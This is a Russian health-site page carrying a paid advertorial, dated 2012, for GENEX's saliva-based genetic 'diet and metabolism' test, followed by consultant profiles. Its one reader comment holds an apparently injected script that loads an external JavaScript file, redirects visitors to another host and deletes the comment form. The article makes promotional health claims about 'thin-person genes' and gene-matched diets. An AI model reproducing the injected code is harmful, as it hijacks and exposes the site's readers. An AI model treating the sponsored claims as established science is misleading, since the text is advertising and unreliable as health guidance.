Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Новый метод похудения: ге...  >>  Новый метод похудения: генетический анализ
 
Обратная связь
 

Новый метод похудения: генетический анализ

Размер шрифта
13 февраля 2012 00:00
  • google_analytics: false
  • Нравится

Мечта любого ученого – найти ген, отвечающий за ожирение. И вот, наконец, совсем недавно удалось выделить «гены худых людей». Всего их 28 штук. У каждого 2000-го человека эти гены дублируются, что не дает их носителю набирать вес.

1

Для тех, кто не входит в число обладателей «счастливой» комбинации генов и испытывает трудности с лишним весом, генетики нашли эффективное решение. Компания GENEX единственная в России предоставляет комплексную генетическую диагностику по программе генетического тестирования «Диета и метаболизм».

Данное исследование анализирует более 100 генов, «ответственных» за пищевое поведение каждого пациента. Тест позволяет определить, как усваиваются и перерабатываются углеводы, жиры и белки, просчитывается реакция организма на физические нагрузки. По индивидуальному генетическому профилю пациента будет подобран оптимальный рацион и программа физических упражнений.

.«Ни один организм не функционирует точно так же, как другой. Продукты питания на всех действуют по-разному», – утверждает Наталья Александровна Скрябина, заместитель генерального директора GENEX. «По результатам исследования «Диета и метаболизм» вы получаете рекомендации по питанию, например, «рекомендуется диета с низким содержанием животных жиров». Выбрать диету вы можете самостоятельно или с помощью диетолога. Но если вы не сократите количество животных жиров, диета просто не сработает. ДНК-анализ дает возможность не ставить эксперименты над собой, и если уж садиться на диету, то на самую эффективную».

Сдать генетический анализ просто – необходимо наполнить слюной специальную пробирку и закрыть ее крышкой с солевым раствором. После того, как биоматериал для анализа подготовлен, компания GENEX отправляет пробирку в США, в г. Сан-Диего. Там расположена одна из немногих лабораторий, получивших соответствующую сертификацию. В лаборатории происходит обработка биологического материала, после чего пишется отчет, который высылается пациенту в электронном виде. На основании отчета генетики GENEX пишут заключение, исходя из которого, пациент получает информацию об уникальных генетических особенностях своего организма и наиболее эффективных для себя способах сохранения и поддержания оптимальной физической формы.


Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:56

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.